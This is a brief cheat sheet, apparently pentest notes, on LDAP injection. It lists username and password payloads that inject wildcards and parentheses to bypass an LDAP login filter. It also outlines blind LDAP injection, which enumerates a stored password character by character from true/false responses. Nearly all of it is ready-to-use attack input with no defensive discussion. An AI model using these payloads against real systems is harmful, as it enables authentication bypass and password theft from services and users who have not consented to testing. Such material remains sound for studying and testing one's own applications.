LDAP Injections

Basic LDAP Injection

# Classical request : (&(uid=)(userPassword=))
# So result is TRUE if uid AND userPassword are true
# You can put ‘)’ in request to crash and see the request

username : *)(|(uid=*
password : )(&(uid=*)(|(uid=*)(userPassword=)))

OR

username=*
password=*)(&(&(uid=*)(userPassword=*)(&))


Blind LDAP Injection

# You have to find/imagine how is the request built

# test using only a char → OK → request is (mail=*[texte]*)
# You can try (mail=*)(sn=*) → )(sn= → OK
# Then, the password attribute (mail=*)(password=*) → OK

@*)(password=x → FALSE
@*)(password=d → TRUE

# You can the enumerate each char